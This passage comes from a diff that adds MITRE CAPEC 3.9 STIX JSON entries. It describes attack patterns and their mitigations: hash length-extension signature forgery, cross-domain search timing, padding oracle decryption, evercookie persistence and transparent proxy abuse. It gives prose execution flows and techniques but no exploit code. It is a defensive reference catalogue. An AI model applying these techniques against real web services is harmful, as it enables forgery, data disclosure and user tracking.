", + "x_capec_prerequisites": [ + "HTTP protocol is used with some GET/POST parameters passed" + ], + "x_capec_resources_required": [ + "Any tool that enables intercepting and tampering with HTTP requests" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: If using a Web Application Firewall (WAF), filters should be carefully configured to detect abnormal HTTP requests", + "id": "course-of-action--fa76a44a-7309-4edc-96e7-8994b9b72371", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-460-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d1f5c4e8-5bc1-44be-a928-3f47b794cce5", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fa76a44a-7309-4edc-96e7-8994b9b72371", + "target_ref": "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Perform URL encoding", + "id": "course-of-action--a8f935d9-6238-4a25-98d1-ec2b90cf2dc5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-460-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--c9d7213f-0542-4267-896f-cde00d9ba131", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a8f935d9-6238-4a25-98d1-ec2b90cf2dc5", + "target_ref": "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use strict regular expressions in URL rewriting", + "id": "course-of-action--38331521-a7db-4428-92ae-dcc62432d4be", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-460-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--48510a25-def9-4c25-85ee-67173f7f2246", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--38331521-a7db-4428-92ae-dcc62432d4be", + "target_ref": "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Beware of multiple occurrences of a parameter in a Query String", + "id": "course-of-action--8846dae1-8419-4e74-8ec5-58bff613dbec", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-460-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": 
"2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--315c1643-cc8e-472e-8bbc-264b098bf84b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8846dae1-8419-4e74-8ec5-58bff613dbec", + "target_ref": "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary utilizes a hash function extension/padding weakness, to modify the parameters passed to the web service requesting authentication by generating their own call in order to generate a legitimate signature hash (as described in the notes), without knowledge of the secret token sometimes provided by the web service.", + "external_references": [ + { + "external_id": "CAPEC-461", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/461.html" + }, + { + "external_id": "CWE-328", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/328.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "description": "Thai Duong, Juliano Rizzo, Flickr's API Signature Forgery Vulnerability, 2009--09---28", + "external_id": "REF-398", + "source_name": "reference_from_CAPEC", + "url": "http://netifera.com/research/flickr_api_signature_forgery.pdf" + } + ], + "id": "attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Web Services API Signature Forgery Leveraging Hash Function Extension Weakness", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": 
"Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "To leverage an attack against the has function extension / padding weakness, consider the message to be passed to the web service is M (this message includes the parameters passed to the web service concatenated with the secret token / key bytes). The message M is hashed and that hash is passed to the web service and is used for authentication. The attacker does not know M, but can see Hash (M) and Length (M). The attacker can then compute Hash (M || Padding (M) || M') for any M'. The attacker does not know the entire message M, specifically the attacker does not know the secret bytes, but that does not matter. The attacker is still able to sign their own message M' and make the called web service verify the integrity of the message without an error." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find a vulnerable web service: The adversary finds a web service that uses a vulnerable authentication scheme, where an authentication token is concatenated with the parameters of a request and then hashed

  2. Techniques
    Read application documentation to learn about authentication schemes being used
    Observe web service traffic to look for vulnerable authentication schemes

Experiment

  1. Attempt adding padding to parameters: An adversary tests if they can simply add padding to the parameters of a request such that the request is technically changed, with the hash remaining the same

  2. Techniques
    Exploit the hash function extension / padding weakness with only padding to test the weakness

Exploit

  1. Add malicious parameters to request: Add malicious parameters to a captured request in addition to what is already present. Do this by exploiting the padding weakness of the hash function and send the request to the web service so that it believes it is authenticated and acts on the extra parameters.

  2. Techniques
    Exploit the hash function extension / padding weakness by adding malicious parameters to a web service request such that it is still deemed authentic
", + "x_capec_extended_description": "\n When web services require callees to authenticate, they sometimes issue a token / secret to the caller that the caller is to use to sign their web service calls. In one such scheme the caller, when constructing a request, would concatenate all of the parameters passed to the web service with the provided authentication token and then generate a hash of the concatenated string (e.g., MD5, SHA1, etc.). That hash then forms the signature that is passed to the web service which is used on the server side to verify the origin authenticity and integrity of the message. Because of the iterative design of the hash function, it is possible, from only the hash of a message and its length, for an adversary to conduct signature forgery by computing the hash of longer messages that start with the initial message and include the padding required for the initial message to reach a multiple of 512 bits. It is important to note that the attack not limited to MD5 and will work on other hash functions such as SHA1.\n ", + "x_capec_prerequisites": [ + "Web services check the signature of the API calls", + "Authentication tokens / secrets are shared between the server and the legitimate client", + "The API call signature is generated by concatenating the parameter list with the shared secret and hashing the result.", + "An iterative hash function like MD5 and SHA1 is used.", + "An attacker is able to intercept or in some other way gain access to the information passed between the legitimate client and the server in order to retrieve the hash value and length of the original message.", + "The communication channel between the client and the server is not secured via channel security such as TLS" + ], + "x_capec_resources_required": [ + "\n Access to a function to produce a hash (e.g., MD5, SHA1)\n Tools that allow the attacker to intercept a message between the client and the server, specifically the hash that is the signature and the length of 
the original message concatenated with the secret bytes\n " + ], + "x_capec_skills_required": { + "Medium": "Medium level of cryptography knowledge, specifically how iterative hash functions work. This is needed to select proper padding." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use a secure message authentication code (MAC) function such as an HMAC-SHA1", + "id": "course-of-action--4f8988fb-2aec-4c9c-bd03-a3c8ca7fed94", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-461-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--73e90459-19d2-486f-ab40-7a72b5bc43fa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f8988fb-2aec-4c9c-bd03-a3c8ca7fed94", + "target_ref": "attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker initiates cross domain HTTP / GET requests and times the server responses. The timing of these responses may leak important information on what is happening on the server. 
Browser's same origin policy prevents the attacker from directly reading the server responses (in the absence of any other weaknesses), but does not prevent the attacker from timing the responses to requests that the attacker issued cross domain.", + "external_references": [ + { + "external_id": "CAPEC-462", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/462.html" + }, + { + "external_id": "CWE-385", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/385.html" + }, + { + "external_id": "CWE-352", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/352.html" + }, + { + "external_id": "CWE-208", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/208.html" + }, + { + "description": "Chris Evans, Cross-Domain Search Timing, 2009--12---11", + "external_id": "REF-399", + "source_name": "reference_from_CAPEC", + "url": "http://scarybeastsecurity.blogspot.com/2009/12/cross-domain-search-timing.html" + } + ], + "id": "attack-pattern--5871f734-1898-4509-860c-f418cdf6b2ac", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Cross-Domain Search Timing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine service to send cross domain requests to: The adversary first determines which service they will be sending the requests to

Experiment

  1. Send and time various cross domain requests: Adversaries will send a variety of cross domain requests to the target, timing the time it takes for the target to respond. Although they won't be able to read the response, the adversary can use the time to infer information about what the service did upon receiving the request.

  2. Techniques
    Using a GET request, leverage the \"img\" tag in conjunction with \"onload() / onerror()\" javascript events to time a response
    Using a POST request, leverage the \"iframe\" element and use the \"onload()\" event to time a response

Exploit

  1. Infer information from the response time: After obtaining reponse times to various requests, the adversary will compare these times and infer potentially sensitive information. An example of this could be asking a service to retrieve information and random usernames. If one request took longer to process, it is likely that a user with that username exists, which could be useful knowledge to an adversary.

  2. Techniques
    Compare timing of different requests to infer potentially sensitive information about a target service
", + "x_capec_extended_description": "\n For GET requests an attacker could for instance leverage the \"img\" tag in conjunction with \"onload() / onerror()\" javascript events. For the POST requests, an attacker could leverage the \"iframe\" element and leverage the \"onload()\" event. There is nothing in the current browser security model that prevents an attacker to use these methods to time responses to the attackers' cross domain requests. The timing for these responses leaks information. For instance, if a victim has an active session with their online e-mail account, an attacker could issue search requests in the victim's mailbox. While the attacker is not able to view the responses, based on the timings of the responses, the attacker could ask yes / no questions as to the content of victim's e-mails, who the victim e-mailed, when, etc. This is but one example; There are other scenarios where an attacker could infer potentially sensitive information from cross domain requests by timing the responses while asking the right questions that leak information.\n ", + "x_capec_prerequisites": [ + "Ability to issue GET / POST requests cross domainJava Script is enabled in the victim's browserThe victim has an active session with the site from which the attacker would like to receive informationThe victim's site does not protect search functionality with cross site request forgery (CSRF) protection" + ], + "x_capec_resources_required": [ + "Ability to issue GET / POST requests cross domain" + ], + "x_capec_skills_required": { + "Low": "Some knowledge of Java Script" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: The victim's site could protect all potentially sensitive functionality (e.g. 
search functions) with cross site request forgery (CSRF) protection and not perform any work on behalf of forged requests", + "id": "course-of-action--f46f8204-a5a5-4d0b-927d-1204f8d80a35", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-462-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a8f742a2-4f13-496c-ae38-b401f66aa531", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f46f8204-a5a5-4d0b-927d-1204f8d80a35", + "target_ref": "attack-pattern--5871f734-1898-4509-860c-f418cdf6b2ac", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: The browser's security model could be fixed to not leak timing information for cross domain requests", + "id": "course-of-action--91807008-54b1-456b-8522-5ba6ea9ca3b5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-462-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6c073f92-1bbc-43d5-92cf-3df1be18d378", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--91807008-54b1-456b-8522-5ba6ea9ca3b5", + "target_ref": "attack-pattern--5871f734-1898-4509-860c-f418cdf6b2ac", + "type": 
"relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary is able to efficiently decrypt data without knowing the decryption key if a target system leaks data on whether or not a padding error happened while decrypting the ciphertext. A target system that leaks this type of information becomes the padding oracle and an adversary is able to make use of that oracle to efficiently decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). In addition to performing decryption, an adversary is also able to produce valid ciphertexts (i.e., perform encryption) by using the padding oracle, all without knowing the encryption key.", + "external_references": [ + { + "external_id": "CAPEC-463", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/463.html" + }, + { + "external_id": "CWE-209", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/209.html" + }, + { + "external_id": "CWE-514", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/514.html" + }, + { + "external_id": "CWE-649", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/649.html" + }, + { + "external_id": "CWE-347", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/347.html" + }, + { + "external_id": "CWE-354", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/354.html" + }, + { + "external_id": "CWE-696", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/696.html" + }, + { + "description": "Juliano Rizzo, Thai Duong, Practical Padding Oracle Attacks, 2010--05---25", + "external_id": "REF-400", + "source_name": "reference_from_CAPEC", + "url": "https://www.usenix.org/legacy/events/woot10/tech/full_papers/Rizzo.pdf" + } + ], + 
"id": "attack-pattern--63048cb5-6d42-4fa2-a0e1-eeff2ef2a34d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Padding Oracle Crypto Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--f1336271-5f27-40de-a61b-aba6572d120f" + ], + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "An adversary sends a request containing ciphertext to the target system. Due to the browser's same origin policy, the adversary is not able to see the response directly, but can use cross-domain information leak techniques to still get the information needed (i.e., information on whether or not a padding error has occurred). This can be done using \"img\" tag plus the onerror()/onload() events. The adversary's JavaScript can make web browsers to load an image on the target site, and know if the image is loaded or not. This is 1-bit information needed for the padding oracle attack to work: if the image is loaded, then it is valid padding, otherwise it is not." + ], + "x_capec_extended_description": "\n Any cryptosystem can be vulnerable to padding oracle attacks if the encrypted messages are not authenticated to ensure their validity prior to decryption, and then the information about padding error is leaked to the adversary. This attack technique may be used, for instance, to break CAPTCHA systems or decrypt/modify state information stored in client side objects (e.g., hidden fields or cookies). This attack technique is a side-channel attack on the cryptosystem that uses a data leak from an improperly implemented decryption routine to completely subvert the cryptosystem. The one bit of information that tells the adversary whether a padding error during decryption has occurred, in whatever form it comes, is sufficient for the adversary to break the cryptosystem. 
That bit of information can come in a form of an explicit error message about a padding error, a returned blank page, or even the server taking longer to respond (a timing attack). This attack can be launched cross domain where an adversary is able to use cross-domain information leaks to get the bits of information from the padding oracle from a target system / service with which the victim is communicating.\n ", + "x_capec_prerequisites": [ + "The decryption routine does not properly authenticate the message / does not verify its integrity prior to performing the decryption operation", + "The target system leaks data (in some way) on whether a padding error has occurred when attempting to decrypt the ciphertext.", + "The padding oracle remains available for enough time / for as many requests as needed for the adversary to decrypt the ciphertext." + ], + "x_capec_resources_required": [ + "\n Ability to detect instances where a target system is vulnerable to an oracle padding attack\n Sufficient cryptography knowledge and tools needed to take advantage of the presence of the padding oracle to perform decryption / encryption of data without a key\n " + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use a message authentication code (MAC) or another mechanism to perform verification of message authenticity / integrity prior to decryption", + "id": "course-of-action--e62691da-d711-47e8-8c82-b97dcb9b3a05", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-463-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--a67f1d51-adca-411e-89d1-92f674949ad3", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e62691da-d711-47e8-8c82-b97dcb9b3a05", + "target_ref": "attack-pattern--63048cb5-6d42-4fa2-a0e1-eeff2ef2a34d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Do not leak information back to the user as to any cryptography (e.g., padding) encountered during decryption.", + "id": "course-of-action--330dc21b-bad8-4391-98c9-c29f84c83208", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-463-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4c01803b-7af5-4c55-98ce-633b944b0847", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--330dc21b-bad8-4391-98c9-c29f84c83208", + "target_ref": "attack-pattern--63048cb5-6d42-4fa2-a0e1-eeff2ef2a34d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker creates a very persistent cookie that stays present even after the user thinks it has been removed. The cookie is stored on the victim's machine in over ten places. When the victim clears the cookie cache via traditional means inside the browser, that operation removes the cookie from certain places but not others. 
The malicious code then replicates the cookie from all of the places where it was not deleted to all of the possible storage locations once again. So the victim again has the cookie in all of the original storage locations. In other words, failure to delete the cookie in even one location will result in the cookie's resurrection everywhere. The evercookie will also persist across different browsers because certain stores (e.g., Local Shared Objects) are shared between different browsers.", + "external_references": [ + { + "external_id": "CAPEC-464", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/464.html" + }, + { + "external_id": "CWE-359", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/359.html" + }, + { + "description": "Forge Web Credentials: Web Cookies", + "external_id": "T1606.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1606/001" + }, + { + "description": "Samy Kamkar, Evercookie, 2010--09---09", + "external_id": "REF-401", + "source_name": "reference_from_CAPEC", + "url": "http://samy.pl/evercookie/" + } + ], + "id": "attack-pattern--ed57f38c-2f0c-47ad-a6e2-16932fde978f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Evercookie", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--ec382da0-af49-489b-bca1-a555d48b7ce3" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n The places a persistent cookie is stored on a victim's machine include: Standard HTTP Cookies, Local Shared Objects (Flash Cookies), Silverlight Isolated Storage, Storing cookies in RGB values of auto-generated, force-cached, PNGs using HTML5 Canvas tag to read pixels (cookies) back out, Storing cookies in Web History, Storing cookies in HTTP ETags, Storing cookies in Web cache, window.name caching, Internet 
Explorer userData storage, HTML5 Session Storage, HTML5 Local Storage, HTML5 Global Storage, HTML5 Database Storage via SQLite, among others.\n ", + "x_capec_prerequisites": [ + "The victim's browser is not configured to reject all cookiesThe victim visits a website that serves the attackers' evercookie" + ], + "x_capec_resources_required": [ + "Evercookie source code" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Browser's design needs to be changed to limit where cookies can be stored on the client side and provide an option to clear these cookies in all places, as well as another option to stop these cookies from being written in the first place.", + "id": "course-of-action--613f9459-29ce-43e4-91dd-68f4e6148ef6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-464-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e1626045-707b-4f32-995a-db4309834849", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--613f9459-29ce-43e4-91dd-68f4e6148ef6", + "target_ref": "attack-pattern--ed57f38c-2f0c-47ad-a6e2-16932fde978f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Safari browser's private browsing mode is currently effective against evercookies.", + "id": "course-of-action--252ad1a2-1f99-45a1-a6b1-8ed47af8a5c5", + 
"modified": "2022-09-29T00:00:00.000Z", + "name": "coa-464-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8204979e-c9d8-4eee-a37d-f28d5d01c12e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--252ad1a2-1f99-45a1-a6b1-8ed47af8a5c5", + "target_ref": "attack-pattern--ed57f38c-2f0c-47ad-a6e2-16932fde978f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "A transparent proxy serves as an intermediate between the client and the internet at large. It intercepts all requests originating from the client and forwards them to the correct location. The proxy also intercepts all responses to the client and forwards these to the client. 
All of this is done in a manner transparent to the client.", + "external_references": [ + { + "external_id": "CAPEC-465", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/465.html" + }, + { + "external_id": "CWE-441", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/441.html" + }, + { + "description": "Proxy: Internal Proxy", + "external_id": "T1090.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1090/001" + }, + { + "description": "Robert Auger, Socket Capable Browser Plugins Result In Transparent Proxy Abuse, 2009", + "external_id": "REF-402", + "source_name": "reference_from_CAPEC", + "url": "http://www.thesecuritypractice.com/the_security_practice/TransparentProxyAbuse.pdf" + } + ], + "id": "attack-pattern--2b6e94c6-26d0-489c-989c-9f4307348c42", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Transparent Proxy Abuse", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--ec382da0-af49-489b-bca1-a555d48b7ce3" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n Transparent proxies are often used by enterprises and ISPs. For requests originating at the client transparent proxies need to figure out the final destination of the client's data packet. Two ways are available to do that: either by looking at the layer three (network) IP address or by examining layer seven (application) HTTP header destination. A browser has same origin policy that typically prevents scripts coming from one domain initiating requests to other websites from which they did not come. To circumvent that, however, malicious Flash or an Applet that is executing in the user's browser can attempt to create a cross-domain socket connection from the client to the remote domain. 
The transparent proxy will examine the HTTP header of the request and direct it to the remote site thereby partially bypassing the browser's same origin policy. This can happen if the transparent proxy uses the HTTP host header information for addressing rather than the IP address information at the network layer. This attack allows malicious scripts inside the victim's browser to issue cross-domain requests to any hosts accessible to the transparent proxy.\n ", + "x_capec_prerequisites": [ + "Transparent proxy is usedVulnerable configuration of network topology involving the transparent proxy (e.g., no NAT happening between the client and the proxy)Execution of malicious Flash or Applet in the victim's browser" + ], + "x_capec_skills_required": { + "Medium": "Creating malicious Flash or Applet to open a cross-domain socket connection to a remote system" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that the transparent proxy uses an actual network layer IP address for routing requests. 
